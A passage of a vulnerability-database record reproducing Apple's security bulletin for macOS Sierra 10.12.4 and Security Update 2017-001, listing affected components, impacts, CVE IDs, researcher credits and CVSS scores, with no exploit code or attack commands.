4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: August 29, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0736", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", "CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2017-03-27T00:00:00", "id": "APPLE:E8FF9F04ED54DD8E8D5B899FB4A8000E", "href": "https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:24", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang(@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in an group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:52:03", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", "CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", "CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", 